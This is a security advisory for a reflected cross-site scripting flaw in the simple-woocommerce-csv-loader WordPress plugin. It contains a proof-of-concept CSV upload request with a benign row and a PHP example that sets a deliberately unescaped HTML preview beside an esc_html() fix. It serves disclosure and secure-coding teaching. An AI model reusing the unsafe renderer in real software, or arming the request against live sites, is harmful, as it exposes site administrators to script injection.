The plugin does not sanitise and escape the imported CSV data before outputting it back into the admin page, leading to a Reflected Cross-Site Scripting issue.
```http
POST /wp-admin/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookies: [logged in admin]
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYaKY5tnSQ8biGkYB

------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="post_type"

product
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="separator"

,
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="titeled"

on
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="hierarchical_multicat"

on
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="upload_file"; filename="example_code.csv"
Content-Type: text/csv

Name,Content,Price,Gender,sku,Multi_cat,Thumbnail
Strawberry Short Cake,Delicious Strawberry Cake 18"",80,Bakery,001,Dessert,
```
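The defect described above is an output-escaping bug: cells read from the uploaded CSV are written into the admin page as raw HTML. The following is an added example, not the plugin's own code, that shows the unsafe preview pattern next to a hardened version. It assumes the plugin builds an HTML preview of the parsed rows and that the fix uses WordPress's `esc_html()`; the `parse_csv`, `render_preview_unsafe` and `render_preview_safe` function names, the `esc_html()` stand-in for running outside WordPress, and the sample CSV rows are all constructed for this illustration.

```php
<?php
// Added example (not the plugin's code): CSV import preview, unsafe vs hardened.
// Assumption: inside WordPress, esc_html() is the escaping function to use for
// an HTML text context. Outside WordPress a stand-in is defined so that this
// file runs from the CLI (php example.php).

if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Constructed sample input. The first data row carries the CSV-escaped inch
// mark (18"") seen in the advisory's request body; the second carries HTML
// markup in the Name field, which a raw echo would hand to the browser as-is.
const SAMPLE_CSV = <<<'CSV'
Name,Content,Price,Gender,sku,Multi_cat,Thumbnail
"Strawberry Short Cake","Delicious Strawberry Cake 18""",80,Bakery,001,Dessert,
"<b>marker</b> Cake","Plain cake",10,Bakery,002,Dessert,
CSV;

/** Parse CSV text into an array of rows using the given field separator. */
function parse_csv(string $csv, string $separator = ','): array {
    $rows = [];
    $fh = fopen('php://memory', 'r+');
    fwrite($fh, $csv);
    rewind($fh);
    // Empty escape string: rely on doubled quotes only, as RFC 4180 does.
    while (($row = fgetcsv($fh, 0, $separator, '"', '')) !== false) {
        $rows[] = $row;
    }
    fclose($fh);
    return $rows;
}

/** Unsafe: cells are concatenated into HTML verbatim (the advisory's bug class). */
function render_preview_unsafe(array $rows): string {
    $html = '<table>';
    foreach ($rows as $row) {
        $html .= '<tr>';
        foreach ($row as $cell) {
            $html .= '<td>' . $cell . '</td>';
        }
        $html .= '</tr>';
    }
    return $html . '</table>';
}

/** Hardened: every cell is escaped for an HTML text context before output. */
function render_preview_safe(array $rows): string {
    $html = '<table>';
    foreach ($rows as $row) {
        $html .= '<tr>';
        foreach ($row as $cell) {
            $html .= '<td>' . esc_html((string) $cell) . '</td>';
        }
        $html .= '</tr>';
    }
    return $html . '</table>';
}

$rows = parse_csv(SAMPLE_CSV);
// Unsafe output: the <b> tag from the file becomes live markup in the page.
echo render_preview_unsafe($rows), PHP_EOL;
// Hardened output: the same cell appears as &lt;b&gt;marker&lt;/b&gt;, and the
// inch mark is emitted as &quot;, so nothing from the file is parsed as HTML.
echo render_preview_safe($rows), PHP_EOL;
```

The escaping has to happen at output time and per context: `esc_html()` is right for text between tags, while a cell placed into an attribute would need `esc_attr()` instead. Sanitising on input alone is not a substitute, because the same value may later be written into several different contexts.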
CPE

| Name | Operator | Version |
|---|---|---|
| simple-woocommerce-csv-loader | eq | * |